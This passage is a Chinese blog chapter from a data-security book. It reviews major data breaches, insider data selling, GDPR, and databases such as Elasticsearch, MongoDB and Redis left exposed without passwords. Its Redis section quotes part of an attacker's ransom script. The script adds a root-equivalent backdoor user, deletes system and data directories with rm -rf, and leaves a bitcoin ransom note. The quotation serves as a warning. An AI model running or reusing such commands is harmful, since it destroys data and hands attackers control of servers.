《数据安全警示录（修订版）》第一章-知己知彼忘战必危

原创 eygle 2019-08-31

1941

第一章知己知彼忘战必危

国虽大，好战必亡;

天下虽安，忘战必危。

----- 《司马法·仁本》

知彼知己者；百战不殆。

----《孙子·谋攻》

在关注数据安全的过程中，我们必须了解安全风险来自何处，并且能够知己知彼，从而针对性的防范这些安全风险。

现代社会，我们每个人的信息都在被数据量化，如果这些数据出现泄露或者扩散，就可能危及我们每个人的生活。可能很多人都有过这样的经历：刚买了房，就有房地产中介打电话问你是否要出租出售；刚买了车，就有保险公司打电话问你是否要买保险；刚生了孩子，就收到各种婴儿用品的推销电话。这种种让人烦恼的骚扰之后，就意味着你的信息已经被泄露。

而在数据库运维过程中，硬盘固件的损坏可能让数据损毁；维护人员的一个误操作也可能导致灾难性的后果，让数据荡然无存。

无论是来自内外部的恶意导致数据风险，还是来自日常工作或运维导致的数据损失，都是企业管理者必须面对的现实。

以下的几则案例，让我们从各个角度一窥现代社会的种种数据风险。

1．危机四伏，数据注定泄露

信息时代，当数据被记录和存储下来，在漫长的存续周期内，时刻面临着各种风险，甚至可以说这些重要的数据终将泄露，而作为用户，我们必须具备的常识是，对于关键重要的个人数据，保持警惕和敏感，不轻易提供、不使用通用密码口令等信息，使用尽可能高的身份验证级别，这样或许才能减少一点点数据时代的风险。

在2018年中，整个行业暴露出大量的数据安全事件，遭到泄露的数据规模越来越惊人，这应当引起每个人的警醒。以下列举的几个典型事件可能影响到每一个人：

1．Facebook 5000万用户信息泄露事件

2018年3月16日，Facebook 被曝在2014年有超过5000万名用户（接近Facebook美国活跃用户总数的三分之一，美国选民人数的四分之一）资料遭“剑桥分析”公司非法用来发送政治广告，部分媒体将其视为 Facebook 有史以来遭遇的最大型数据泄露事件，但 Facebook 方面否认这是一起数据泄露事件。

这个案例告诉我们：互联网上的数据，可能以各种方式被采集、窃取、销售，从而被利用，我们要时刻提高警惕，避免在个人信息中暴露自己的核心机密。而企业应该提高自律，国家和政府提高立法和用户信息保护工作。

2．华住汉庭1.3亿用户数据泄露事件

在2018年8月28日，华住汉庭的用户数据泄露事件开始传播，事件起因疑似华住公司程序员将数据库连接方式上传至github导致其泄露，这次事件中，泄漏的数据真实完整，有关联性可以验证，总共有3个库。

第一个库是华住的官网注册资料，包括身份证号、手机号、邮箱、登录密码等，共53G。
第二个库为入住登记身份信息，包括姓名、身份证号、家庭住址、生日、内部ID号，共22.3G，约1.3亿条。
第三个库是酒店开房信息，包括内部ID号、同房间关联号、姓名、银行卡号、手机号、邮箱、入住时间、离开时间、酒店ID号、房间号、消费金额等，共66.2G，约2.4亿条。

这个案例告诉我们：所有企业都是信息化企业，所有信息的处理都应该遵循规范化流程，关于数据安全的思考不能停歇。

3．喜达屋5亿用户数据泄露

在2018年11月30日，万豪国际宣布，全球5亿万豪与喜达屋旗下酒店用户数据遭遇泄露，被窃取的信息包括用户的姓名、邮箱地址、家庭住址、护照号以及可能存在的信用卡信息。

根据万豪国际的公告，此次攻击至少从2014年开始。而2015年喜达屋被POS（Point Of Sale）恶意软件入侵的调查报告中指出POS 恶意软件入侵也是在2014年开始。

所以有理由相信2014年喜达屋遭到了有组织的黑客入侵，入侵规模和范围都比喜达屋2015年发现的更严重。万豪是在2018年9月8号发现的未授权访问数据问题，9月10日就成功阻断了入侵攻击，安全专家花了2个多月时间完成对被盗取的加密数据进行溯源工作，并恢复了一部分找到的数据，尝试给出了可能被盗取数据的范围，2018年11月19日，对事件的调查显示，未经授权访问的数据库，其中信息包含“2018年9月10日或之前有关喜达屋酒店预订的客人信息”。

万豪国际的公告中明确指出黑客在喜达屋的预订数据库中进行了数据的复制和加密工作，2014年黑客很可能已经在数据库中留有后门，后门可能是一组触发器和存储过程构成。

大公司遭遇数据泄露的事件屡有发生，不过这起事件令人震惊的是，攻击者的实施进程非常缓慢，竟然用了4年时间，而万豪直到现在才发现，引起舆论质疑。用户数据泄露对于企业而言无疑会令其声誉遭到损失，而根据2018年12月1日的消息，针对万豪提起的一项集体行动诉讼请求赔偿125亿美元，即每个隐私可能受到损害的客户25美元。

这个案例告诉我们：企业的数据访问安全需要清晰明确，数据从何处来到何处去，安全部门应该了然于胸，及时发现和阻断未授权的访问来源和访问应用，是提升数据安全的必备能力。

4．用户火车票订购信息泄露

在2018年12月28日，有人在网上宣称12306平台旅客信息泄漏，低价出售60万个帐号，410万旅客信息，黑客还免费公开部分账号供买家验证。经过随机选择账号测试均可成功登录，并得到旅客证实数据泄露。12306官方最终确认，平台未发生用户信息泄漏情况，网络售卖信息为旅客登陆第三方平台时泄漏。

这则数据泄露事件迅速得到了后续处置，传播信息者已经被刑拘：

经查，一网络用户在网上贩卖疑似12306铁路订票网站的用户数据…经专案组网上侦查、溯源追踪，成功锁定犯罪嫌疑人为我市西城区某科技有限公司员工陈某，后于29日在该公司所在地将其抓获归案。

经讯问，陈某供述60余万条用户注册信息，系其前期在网上非法购买所得，并非通过对12306官方网站技术入侵获取。其余410余万条铁路乘客信息，系其利用上述用户注册信息，通过第三方网络订票平台非法获取。

目前，嫌疑人陈某因涉嫌侵犯公民个人信息罪被西城分局刑事拘留。案件正在进一步审理中。

这个案例告诉我们：只要是输入用户和密码之处，就值得警惕，尤其是涉及大量个人信息存取之处，要尽量通过官方平台进行敏感业务操作。而接触到这些数据的个人，也应当遵循数据道德，否则将会面临法律的惩罚。

总结一下，从以上事件我们可以看到，在日常生活的衣食住行活动中，个人信息不可避免的会被生成和记录下来，而存储这些信息的企业，一旦出现安全风险，就可能导致数据大量的泄露，要知道没有攻不破的系统，没有窃取不到的数据，只要记录，就注定泄露，而作为用户，我们要做到的只能是知己知彼，防范风险，做好预案，避免数据泄露可能为自己带来的损失。

而从事数据处理和流转的技术工作者，要时刻遵守数据道德，避免主观上的数据侵犯而违反了法律法规。

2．从罗维邓白氏案例看数据道德

2012年3月15日，中央电视台爆出“上海罗维邓白氏营销服务有限公司”出售用户隐私信息案件，随后该公司被警方停业调查。该公司的很多数据人员受到牵连。

从这个案例中，我们看到数据的重要性，以及数据从业人员的职业道德和职业风险，以下几点概要信息供读者参考：

1．数据是社会信息的核心基石，其中蕴藏着丰富的信息与价值
2．管理数据并不意味着就可以“接触”数据、获取数据、传播数据
3．数据从业人员要有基本的职业操守和数据道德
4．从事数据管理的DBA们应当谨记：不接触、不修改、不传播自己管理的数据
5．遵守数据道德即是职业操守也是自我保护
6．要遵守法律法规，不越界

根据新闻报道，我们摘录了以下案件概要：

商业信息提供商邓白氏集团(Dun & Bradstreet Corp.)说，已暂停了旗下一家中国内地公司的业务，目前该公司正面临一项是否违反了中国消费者资料隐私法的调查。另外，邓白氏集团也在调查其在华雇员是否违反了美国的《海外反腐败法》(Foreign Corrupt Practices Act)。

调查涉及的上海罗维邓白氏是一家利用自身数据库帮助营销商联系客户的直销商。邓白氏集团在周一的声明中说，它于2009年收购了这家上海公司，该公司2011年实现收入约2,300万美元，运营利润200万美元。

声明说，邓白氏集团正在配合上海调查人员的工作，并且已将有关问题上报给了美国司法部和美国证券交易委员会(U.S. Securities and Exchange Commission)。
此前，中国官方媒体中国中央电视台上周报道了该公司以不当方式收集了1.5亿名消费者个人信息的消息。

美富律师事务所(Morrison & Foerster LLP)北京办公室执行合伙人麦肯齐(Paul McKenzie)说，在中国的法律框架下，公民拥有广泛的隐私权，尽管和其他国家相比，中国隐私法律体系尚不健全。

中国的刑法规定，政府机构工作人员或任何法律规定下可以获得个人信息的行业（如医疗保健、教育、电信）中的私有机构的员工不得向第三方出售数据。购买数据的个人也要负刑事责任，责任大小视情节而定。

通过报道我们可以看到，虽然中国的法律法规并不健全，但是在法律框架下，公民拥有广泛的隐私权，所以从数据业务出发，可能处处触及法律保护的用户隐私权。

以下是另外一则新闻的摘录，该报道中详细描述了可能存在的信息犯罪与获取：

我国《刑法修正案（七）》中明确规定：国家机关或者金融、电信、交通、教育、医疗等单位的工作人员，违反国家规定，将本单位在履行职责或者提供服务过程中获得的公民个人信息，出售或者非法提供给他人，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金。“窃取或者以其他方法非法获取上述信息，情节严重的，依照前款的规定处罚。“单位犯前两款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照该款的规定处罚。”

上海罗维邓白氏营销服务有限公司，是一家专业从事直复营销服务的公司，总部在上海，在北京、广州、西安多个城市设有分公司，其业务最核心的资源，就是精准的个人信息数据库。邓白氏公司的宣传片中也说到：邓白氏数据库，中国中高端消费者数据超过1.5亿条。所谓中高端消费者数据是指什么？又精准到什么程度呢？

工作人员介绍，直复营销就是通过发送短信、电子邮件、拨打电话、实名制邮寄印刷品等方式为客户进行广告营销，他们可以依客户的要求，对拥有的1.5亿个人信息数据，按照地域、职业、身份、资产情况等各方面进行精准筛选。
他们筛选个人银行结余款在50万以上的，销售人员筛到70多万（条）。他们还告诉记者，“像山西，陕西，内蒙，就是职业要求企业主高管，或者说公务员处级以上，然后有高级房，有两套之类的。”都可以筛选出来。
不仅如此，如果客户进一步提出，用个人银行方面这类更敏感的信息来筛选目标，如是否是金卡用户，甚至账户上要有几十万元以上的存款，近期巨额消费支出等情况，工作人员说罗维邓白氏公司依然可以做到。
一位北京销售人员告诉记者，“我们肯定知道，比如说他曾经买过什么样的保险，在哪个银行有所谓的一些储蓄，或者有一些资金的往来也好，我们这个是知道的。”

那么，如此大量、精准的个人信息，罗维邓白氏公司又是从哪里获得的呢？

几位销售人员说到，“北京这边是2006年成立的，可能在北京当地有过购买”；“数据库这边可能会有一些交易，一些买卖。车主什么的、房地产信息可能会有一些买卖。无非就是从4S店来的这种数据，他买的多少钱的车，或者说是保险公司。。。”
除了购买，罗维邓白氏还会从什么渠道获取这些信息呢？销售人员说，“我们在帮银行做业务的同时，有时候打电话的时候，能得到部分这样的信息，像这些基金啊，证券啊，经常找我们给他们去做，因为他们自己，是不能做这种外呼服务的，证监会不允许他们去做，这也是钻证监会一个空子”
罗维邓白氏公司掌握的个人信息数据不仅数量庞大，而且详细精准程度让记者震惊，同时更让人担忧：罗维邓白氏公司除了买信息，是不是还会将这些个人信息出售，向外传播呢？
一位北京的销售人员告诉记者：“按字段收费的那种，三毛钱一个字段。您要是要个十万、二十万的，我估计有可能便宜。”他向记者介绍，他们将一个人单独一项信息内容称作一个字段，对外出售时，一个字段的价格是0.3元，信息越详细，价格越高。比如要是有名字、邮编、地址、电话、车型还有房子（房产）的信息就要一块五。
2012年3月2日，记者如约来到上海罗维邓白氏北京分公司，客户经理拿出一份合同。合同上对个人信息中银行卡信息的字段，以“高消费”的字样代替，这个所谓的“高消费”是什么含义呢？
工作人员说“原始字段要筛选的话，主要就是他的一个存款，然后包括他相关具体一些的基金或者股票等等信息，它都会显示。因为他们每次不管是交易也好，还是什么也好，银行肯定是有一些数据的共享，这一类的资源吧。”

通过以上新闻报道，我们可以看到，在当前的社会上，信息贩卖无处不在，我们的信息一旦登记出去，就在各种渠道被不断贩卖流转，个人隐私也就被不停侵犯，所以，对于个人来说，我们应当时刻保持警觉，尽量保护个人的隐私信息，而各行业的数据从业人员，也应当遵守数据道德。

3．数据库维护员出售新生儿信息

以下是2012年批露的另外一则数据泄露信息，数据库管理员窃取医院的新生儿信息出售获取非法收益，这不仅有违一个技术人员的职业道德，也触犯了法律法规。

上海警方成功将一个非法买卖公民个人信息的犯罪网络摧毁，抓获犯罪嫌疑人50余名，查获各类公民个人信息近2亿条，其中包括数十万条新生儿出生信息。

今年3月15日下午3时，上海警方根据线索破获一起非法获取公民个人信息案，李某等5名犯罪嫌疑人落入法网。经调查，专案组发现“3·15”一案的嫌疑人李某非法获取的新生儿信息量大，更新及时全面。在加强审讯的同时，侦查员走访了本市卫生系统，发现负责开发、维护市卫生局出生系统数据库的工作人员张某有重大作案嫌疑，专案组立即将张某抓捕归案。张某到案后很快交待了他利用开发、维护市卫生局出生系统数据库的职务便利，从去年年初到今年4月，每月两次非法登入数据库，下载新生儿出生信息累计达数十万条，出售给李某非法获利3万余元的犯罪事实。

经过层层深挖，警方先后抓获涉案犯罪嫌疑人50余名，查获各类公民个人信息近2亿条，企业信息数千万条。

这个案例与前一则具有一定的关联性，也属于数据公司收集数据的来源之一，但是显然，这其中的所有参与者都触犯了法律。

作为数据库技术的从业者，切不可因为小利而铤而走险，触犯法律。

4．美国上千万信用卡信息疑遭盗取

金融领域一直是数据安全的核心地带，众多的关注使得这个领域内的一些微小疏漏都可能导致严重的数据泄露灾难。

根据网上消息，信用卡行业机构和人士2012年3月30日证实，美国信用卡账户信息可能遭“大规模”盗取，涉及万事达和威士国际组织等机构信用卡用户、大型发卡银行和数家主要信用卡服务企业，波及账户数量暂时无法确定，评估数量从数以万计至超过1000万。

那么疏漏是如何出现的呢？批露的作案过程如下：

未授权者首先窃取纽约市一家出租车与停车管理企业管理账户权限
由中央服务器盗取电子信息，盗取过程持续数月
最近开始利用账户信息作案后被发觉

以下是新闻事件的摘要，我们每个人都要警惕，因为每个人都可能成为受害者：

万事达和威士当天知会发卡商，旗下信用卡账户信息可能遭窃，关联一家位于美国的“第三方”公司。信用卡支付中介机构美国“全球支付”公司确认，未授权者3月初进入它的系统并可能窃取一些信用卡账户信息，公司定于4月2日就这一事件召集投资者电话会议。
万事达、威士和“全球支付”没有说明信息遭窃波及多少账户。

互联网博客“克雷布斯安全”最先披露“全球支付”信息外泄，以“大规模”认定泄露范围，估计超过1000万信用卡账户受波及。一些行业分析师认为这一评估数字过高，推测数以万计账户信息遭窃。

按照伯恩斯坦调研公司分析师罗德·布儒瓦的说法，“全球支付”只是转账中介服务行业相对小型的企业，有大约80万商家客户，占3.5%的市场份额。相比之下，业内最大机构“第一数据”公司商家客户数以百万计，市场份额为22.6%。
房地产业咨询机构阿尔托斯调研公司首席执行官迈克·西蒙森说，他可能是受害者之一。“美国银行”客户代理人上周联系他并告知他的账户受到调查，所幸没有发现未授权交易记录，“这种事非常少见”。
特工处(隶属于美国国土安全部)等执法机构着手介入这一事件，而万事达已经雇佣一家独立信息安全机构调查。

按照高德纳咨询公司分析师艾维瓦·利坦掌握的消息，系统“侵入点”调查指向纽约市一家出租车与停车管理企业，作案者可能是中美洲犯罪团伙。“如果大家过去几个月用信用卡付过出租车费，请确认信用卡是否被冒用。”
利坦告诉法新社记者，作案人员可能取得那家纽约公司的管理账户权限，由中央服务器盗取电子信息，盗取过程持续数月，最近开始利用账户信息作案后被发觉。博客“克雷布斯安全”3月30日披露，“全球支付”系统在今年1月21日至2月25日、超过一个月的时间内受到入侵。

各家机构没有说明是否已经确认有信用卡用户因这次事件遭受账务损失。不少银行和信用卡服务机构允诺不会让消费者个人承担损失；业内人士说，最终损失由售货商家、发卡方和“全球支付”买单。
“全球支付”2001年剥离自信息服务商“国民数据公司”，作为商家和信用卡账务处理机构之间的中介核对消费者信用卡认证信息，业务环节介于消费者在商家刷卡和银行转账之间。行业技术人员推断，“全球支付”遭窃信息主要涉及信用卡账户的卡号和有效期截止日，偷窃者可以利用这些信息网上购物。为预防作案者“套现”，在线商家可以要求消费者提供通常印于信用卡卡片背后的三位或四位数字“CVV码”。不少行业人士说，收紧信息认证和信用卡使用便利间存在矛盾。奥列马咨询集团部门主管爱德华·劳伦斯说：“如果(认证)系统太严格，没有交易能够获得认可。”

“全球支付”系统遭侵入是全球今年首起类似事件。花旗银行集团去年6月承认，黑客窃取北美地区大约20万名信用卡客户的信息。索尼公司去年4月通报，全球7700万注册用户个人信息可能被盗。
这些事件推动多国政府和行业机构着眼个人账户信息安全。美国国会众议院商业、制造业和贸易小组委员会成员玛丽·博诺呼吁国会今年出台更严格的个人信息安全法规。“当大家用电脑输入信用卡号码并敲击‘确定’键时，不应只能祈祷。”

这则案例告诉我们，即便在安全级别较高的金融领域，因为交易的复杂性和关联性，也可能存在数据被截流泄露等情况，没有永远安全的系统，也没有永远安全的密码，提高安全意识，时时警惕在心。

5．数据外泄主要来自内部

由安全软件公司赛门铁克赞助的Ponemon研究所，2012年3月公布了第七次资料外泄的调查报告，报告分析和统计数据泄露事件对全球金融的影响，以及各企业投资在安全领域的费用。调查数据显示数据外泄近50%来自内部。

研究所花费了9个月对美国，英国，德国，法国，澳大利亚，印度，意大利在内的49家公司，超400个人进行了关于安全数据的研究。

2011年数据安全的人均费用平均为194美元（其中135美元为间接费用），而2010年人均成本为214美元（141美元的间接费用），安全投入出现首次下降。影响成本的主要因素是客户流失率、安全事故发生率等。

下图是调查结果中的历年安全成本投入：

该机构研究还发现数据丢失的最大威胁仍然来自内部的。39%的受访者承认疏忽是资料外泄的根源。接近37％的数据损失是由于来自外部的恶意攻击，恶意员工盗窃是第二个最常见的因素占据33%的比例。

独立的调查数据显示来自组织内部的威胁高达 51.2％，而恶意员工盗窃就是内部威胁的主要组成部分。

这些统计数据告诉我们：数据安全的防范，首先要从企业内部做起。

6．GDPR带来的数据安全思考

当我们置身于网络世界之中，一切的行为都将会被记录下来，互联网企业还会通过『数据画像』让用户具象化、真实化，事实上，在数据面前，我们每个人都只是穿着皇帝的新衣。

那么如何面对这些让人细思极恐的数据世界？欧盟做出了他们的表决，这就是 General Data Protection Regulation – GDPR法案。

欧盟议会于2016年4月通过了GDPR新规，规范欧盟成员国以及任何与欧盟各国进行交易或持有公民（欧洲经济区公民）数据的公司存储和管理个人数据的方式。这项法规在2018年5月25日生效。

然而在新规生效之后，一些新闻显示：『为遵守刚生效的 GDPR 美国网站屏蔽五亿欧洲居民』。Bloombergquint 网站的报道更是使用了『Blocking 500 Million Users Easier Than Complying With GDPR 』标题。

戏剧化的效果：

欧洲数据保护法 GDPR 于 5 月 25 日生效，众多美国网站纷纷选择站在广告商这边，拒绝了来自欧洲的访客。欧洲有五亿居民，是美国人口的 1.5 倍。

拒绝或暂时拒绝欧洲访客的知名网站包括 The Los Angeles Times、Chicago Tribune、The New York Daily News 和 Instapaper。

USA Today 则选择为欧洲访客专门制作了一个 GDPR 版本，移除了所有跟踪脚本和广告，结果美国版本的大小有 5.2MB，而 GDPR 版本只有 500KB，页面加载速度也从 45 秒减少到 3 秒，JS 脚本数量从 124 个减少到 0 个，请求的网址数量也从超过 500 减少到 34 个，简直就像是最初启用了 ad blocker 的效果。

通过这样的事件，我们大约可以知道一个网站到底采集了用户多少数据。

那么GDPR到底是什么？为什么实施起来困难重重，让美国企业选择了简单粗暴的拒绝访问。

GDPR 的本质是赋予欧盟公民个人信息保护的基本权利，其核心是对个人数据的收集和之后的存储使用，规定更高的透明度与管控。在这个条例的约束之下，只要收集欧盟公民数据的企业就要受到GDPR的管辖。

GDPR 主要完成了以下几大使命：

1．明确公民的数据权力和隐私权；
2．明确和扩大了数据保护范围；
3．规范数据收集企业的数据保护、使用权责；

这其中的数据安全事故通知条款，规定在数据安全事故（比如数据泄露）发生之后，应当在72小时内向监督机构报告。

执法和处罚条款则大幅增加处罚标准，对于重大违规事件罚款可高达2000万欧元或前一财年全球收入的4%。

GDPR 进一步扩大了数据保护范围，以下种种信息都被列入：

公民基本的身份信息，如姓名、地址和身份证号等；
网络数据，如位置、IP地址、Cookie数据和RFID标签等；
医疗保健和遗传数据；
生物识别数据，如指纹、虹膜等；
种族或民族数据；
政治观点；
性取向;

公民的数据权力被强化保护，条例中有四条明确了『用户许可』：

·   在数据处理基于用户许可（Consent）的情况下，控制人应能够证明数据主体同意处理其个人数据;
·   如果数据主体的许可是在书面声明中也涉及其他事项的情况下同时提出的，则同意书的提交方式应明确区分于其他事项，使用清晰明了的语言，方便用户的理解和区分。构成违反本法规的此类声明的任何部分均不具有约束力。
·   数据主体有权随时撤回其许可。撤回许可不应影响撤回前基于许可的其他处理的合法性，并且撤销许可应该同授予时一样容易。
·   同意必须是自由作出的。这意味着数据主体在作出同意时，其选择是真实的，例如，不存在受到胁迫或者欺诈的风险。如果数据主体会受到数据控制者的影响（例如，数据控制者是数据主体的雇主，或者是一个公共权威），则考虑到此类关系的性质，同意并不当然被认为是自由作出的。

这其实是在明确用户使用协议的获取过程，以及规范不能滥用这些用户许可，在互联网上，因为一个『同意』因此而导致的无穷尽后果应该被约束。

GDPR 对数据泄露会做出高额惩罚，同时也规范了企业的数据管理角色和责任，这其中包括：

·   数据控制员（Data controller）- 明确个人数据的处理方式和目的，负责确保外部承包商能够遵守相关规定；
·   数据处理员（Data processor）- 可以是维护和处理个人数据记录的内部团队（如业务分析师或开发商的员工），也可以是执行全部或部分这些活动的任何外部服务提供商。GDPR要求数据处理员为违规和不遵守规定的行为负责。
·   数据保护员（Data Protection Officer，简称DPO）- 核心活动涉及处理或存储大量的欧盟公民数据、特殊类别的个人数据（健康记录、犯罪记录）的组织必须指定DPO，DPO主要负责就GDPR规定提供咨询意见，向最高管理层报告。

必要的流程管控是提升安全性的重要手段，设置必要的岗位也非常具备必要性，DPO 会逐渐成为数据安全领域的一个重要角色。

除了明确岗位职责之外，GDPR 还对数据存储安全保护提出了要求：

·   明确和默认的数据保护；
·   将安全性作为合作伙伴、服务提供商的合同要求；
·   加密或假名化；
·   制定对风险评估做出回应的安全措施；
·   保留数据以进行额外处理就必须采取相应保护措施；

GDPR特别将加密作为安全性要求，这对很多企业是迫切需要改善的关键所在。要知道很多泄密事件就来自于数据的未加密存储。

GDPR法案生效以来，已经开始发挥威力，2019年针对Google的一则判罚已经呈现：

英媒称，法国1月21日首次援引欧盟严格的《一般资料保护规例》（GDPR），宣布向Google罚款5000万欧元。

据路透社报道，法国资料保护办公室CNIL称，Google的隐私条款难以被用户理解，尤其在个人化广告上，用户难以管理个人资料如何被使用，因此作出判决。Google发表声明称，用户期待高度透明的数据运用及对隐私的自我控制，而Google也一直承诺确保达到预期，称会研究判决再决定下一步行动。

报道称，两个团体去年5月代表约1万名民众发起诉讼，指Google在Android系统的部分应用程序中表示除非用户同意条款否则不提供服务，是“强制同意”。今次是GDPR落实以来首个案例。根据GDPR的规定，企业可被判罚最多2000万欧元或全年营业额4%，以最高者为准。

其实不仅仅是和互联网相关的用户隐私数据，对于传统企业来说，同样面对着数据保护、数据加密、数据岗位的挑战，在中国数据泄露和泄密的事件同样层出不穷。尤其是在使用数据库的环境下，数据备份、数据传输都需要置于可信的环境下，避免备份被窃取，数据被篡改。

无论如何，数据安全、隐私保护，任何企业都需要不断加强，GDPR 在某种程度上是为企业加强了推动力。

7．数据库的漏洞都会重来

在数据库领域，周而复始发生的数据安全事件，往往都似曾相识。有多少漏洞，全都会在不同的产品身上重演一次，一个都不能少，仿佛所有经验都不曾被借鉴。

比如数据库的初始化部署，初始化的口令和认证方式，往往都因为简便而保留默认方式，当服务器对公网开放时，这些系统就变成了完全不设防的主体，对着危险的黑暗森林发出『我在这里』的呼喊。

后果就是，数据风行天下。以下几则案例，就是这样的情形，可以作为警示。当我们启用一个数据库时，务必铭记，不要依赖缺省的安全设置，这是最基本的安全保证。

1．ElasticSearch 数据泄露案例

Elasticsearch 在全球数据库流行度排行榜上位列第 8 位，是一个被广泛使用的全文搜索引擎，企业一般用它来实现数据索引和搜索功能，但是由于部署或者企业运维上的重视缺乏，而导致的安全事故不绝于耳。

据2019年1月22日信息，美国一家网上赌场集团泄露了超过 1.08 亿笔投注信息。
泄露的信息包括：客户个人资料，存取款记录、家庭住址、电话号码、电子邮件地址、出生日期、网站用户名、帐户余额、IP 地址、浏览器、操作系统信息、上次登录信息和游戏列表，甚至包含当前投注、获胜、用于交易的银行卡等详细信息。
值得庆幸的是，ElasticSearch 服务器中交易银行卡详细信息被部分加密，没有公开完整财务细节；坏消息是任何发现数据库的人都会知道最近赢得大笔金钱的玩家姓名、家庭住址和电话号码，并且可能已将这些作为诈骗或勒索的目标用户。
该服务器被安全研究员 Justin Paine 发现，数据泄露源头是一个 ElasticSearch 服务器，该服务器没有密码保护，不需要身份验证且很明显信息来源于在线投注门户网站。

而此前类似的安全事件，同样言犹在耳：

2018 年 12 月份，巴西最大的订阅电视服务商之一的 Sky Brasil 在没有密码的情况下将 ElasticSearch 服务器暴露在互联网上，其 3200 万客户数据在网上暴露了很长时间，存储数据包括客户姓名、电子邮件地址、密码、付费电视包数据、客户端 IP 地址、个人地址、付款方式、设备型号等。
2018 年 11 月份，美国发生一起 ElasticSearch 服务器在没有密码的开放状态下泄露了将近 5700 万美国民众个人信息的事件。共泄漏超过 73GB 数据，并且几个数据库被缓存在服务器内存中，其中一个数据库包含的个人信息就达到了 56,934,021 份。
2017 年，白帽汇曾对全球使用 ElasticSearch 引擎发生的勒索事件进行监测，最终发现因被攻击而删除的数据至少 500 亿条，被删除数据规模至少 450TB。互联网上公开可访问的 ElasticSearch 服务器超过 68000 余台，受害总数达 9750 台。此次事件后，1% 的 Elasticsearch 启用了验证插件，另外有 2% 则关闭了 Elasticsearch。

注意到这些问题的共同原因，ElasticSearch Server 没有密码，这些事件应该成为大家的警示。不管处于内部还是外部，只要是数据所在，即为堡垒，就应该进行重点的安全加固和防范，防止数据泄露损毁。数据安全重于泰山。我们也不能因为数据能够重构和可以恢复就放松警惕，因为数据泄露对企业和用户带来的伤害往往无法量度。

2．MongoDB数据泄露案例

MongoDB数据库同样存在类似的问题。

根据互联网信息，2018年12月31日推特一用户发文称，他发现国内超过2亿用户的简历信息遭到泄露，这些信息非常详细，简历信息全部来自中国国内，包含诸多详细的信息。

根据该用户给出的截图，这些信息包括姓名、曾用名、性别、出生日期、所在城市、手机号码、邮箱、政治面貌、出生地、户口所在地、国籍、民族、邮编、QQ、微信、所在地址、婚姻状况、子女情况、工作经历等诸多信息。

根据截图来看，该用户所曝光的这些数据应该是来源于一个完整的数据库，目前，许多求职类网站都有推出简历填写功能，甚至还有专门用于美化简历的工具，目前，我们还无法证实该消息。

随后的研究表明这部分数据来自一个未做保护的MongoDB数据库：

整个实例包含 854GB 数据，共有 202,730,434 条记录，其中大部分是中国用户简历，内容非常详细，包括中文全名、家庭住址、电话号码、电子邮件、婚烟状况、政治关系、期望薪水等内容。…大致来源为一个已经删除的 GitHub 存储库，该存储库包含 Web 应用程序的源代码，此应用程序具有与泄露数据库中数据结构完全相同的数据，这清楚表明该程序应该是一个收集用户简历的第三方应用。

在2019年2月13日，国内某人脸识别公司的MongoDB数据库因为未设置访问限制，在公网上开放，导致数据泄露：

该公司其中一个 MongoDB 人脸识别数据库在没有安全认证的情况下直接在公网“裸奔”，可供任何人查找，并允许完全访问，这意味着恶意行为者可以随意添加或删除数据库中的记录。换言之，任何人都可以查看这些记录并跟踪一人的行为。
据悉，被暴露的数据库包含有 2,565,724 名用户的信息，例如身份证号码、身份证发行日期、性别、国家、住址、生日、照片、雇主和过去24小时内的位置，以及仍在飞速增长的 GPS 位置记录，大约有668万条记录。

而类似事件，在MongoDB的世界里并不罕见，在2016年和2017年，针对MongoDB的大规模攻击曾经就席卷而来：

2016年12月27日，安全专家兼GDI Foundation联合创始人Victor Gevers 在Twitter上称由于存在配置漏洞，可不通过任何认证直接访问某些MongoDB数据库，而黑客早已盯上了这些目标。

到 2017年1月3日，被黑客入侵的MongoDB数据库实例这个数字达到了2，000以上。而仅在1月9日早间开始的12小时内，受到黑客勒索的数据库就从12，000个翻倍达到了27，633之多。

尽管安全专家已经告诫众多MongoDB数据库用户不要向黑客支付赎金（很多黑客并不会如宣称的那样保留了数据，多数情况是直接删掉了），但已知仍有至少22个受害机构或个人缴纳了赎金。

而早在2015年 Shodan（搜索引擎）的负责人统计到有30，000个以上的MongoDB数据库实例，近600TB的数据暴露于公网之上，无需任何认证就可访问。很多版本滞后的数据库配置文件里没有做IP捆绑（bind_ip 127.0.0.1），直接开放了缺省的27017端口，在用户不甚了解的时候留下了安全隐患。虽然MongoDB的开发团队后来修复了这个问题，但仍然有数量众多的数据库管理者没来得及更新。

MongoDB 的安全事故原因和前面的 ElasticSearch 非常相似，主要原因就是因为用户没有遵照规范化安全部署，缺少安全认证，并且草率的将服务器暴露在公网里。

3．Redis的数据泄露

在2017年和2018年，关于Redis的安全问题同样大规模暴露出来。其安全原因和前面描述的如出一辙。

Redis 默认情况下，会绑定在 0.0.0.0:6379，这样会将 Redis 服务暴露到公网上，在Redis服务器没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下成功在Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器进行远程控制，获得主机的完全控制权。

当攻击者发现了这些公网可访问并且未设置密码的机器，就会下载恶意脚本，并定时执行，删除用户的数据，该脚本部分内容如下:

#!/bin/bash

#*butterfly*

exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

userdel -r redis

useradd -o -u 0 -g 0 redis &>/dev/nullecho "abcd-1234-!" |passwd--stdin redis &>/dev/null

rm -rf /root/*
rm -rf /home/*
rm -rf /opt/*
rm -rf /data/*
rm -rf /data*
mkdir -p /data echo -e "\nWarning! \nYour File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop thebackup after 24 hours. You are welcome! 。。。\n" > /root/Warning.txt

chmod +x /root/Warning.txt
cp /root/Warning.txt /Warning.txt
......

攻击者要求发送0.6个比特币，否则将在24小时之内删除数据备份。但是从这个脚本中可以明显看出，攻击者根本没有进行备份，即使被攻击者支付了勒索金额，也是无法找回数据的。

综合以上的几个安全事故告诉我们，当时一个新的数据库产品时，一定要关注安全问题，不能想当然：

1．数据安全重于一切，安全防护必不可少；
2．安全需要点滴做起，如从密码防护开始；
3．备份是数据库管理的首要任务有备无患；
4．在初始建设时就着手进行安全加固防范；

只有树立了安全意识，才能够不断完善，走向更加安全的数据新时代。

8．那些运维中的疏忽导致的数据风险

